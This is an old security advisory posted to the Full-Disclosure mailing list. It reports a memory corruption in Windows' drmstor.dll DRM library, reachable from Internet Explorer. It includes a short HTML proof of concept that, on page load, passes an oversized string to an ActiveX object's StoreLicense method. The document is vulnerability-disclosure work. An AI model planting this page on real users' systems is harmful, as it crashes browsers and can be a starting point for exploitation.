Hi to all, While finding buffer overflows in Internet Explorer I found a memory corruption in the "drmstor.dll" library which is a part of the DRM (Digital Rights Management) software supplied with MS Windows.
The following Proof Of Concept is sufficient enough to test the vulnerability: <html> <script> function test() { var obj; var x; x = "AAAA"; for (i=0;i<=21;++i) x += x; obj = document.getElementById('testObj'); obj.StoreLicense(x); } </script> <body onload="test();"> <object id='testObj' classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}"> </object> </body> </html> The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Contact ------- Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es ______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y móviles desde 1 céntimo por minuto. http://es.voice.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/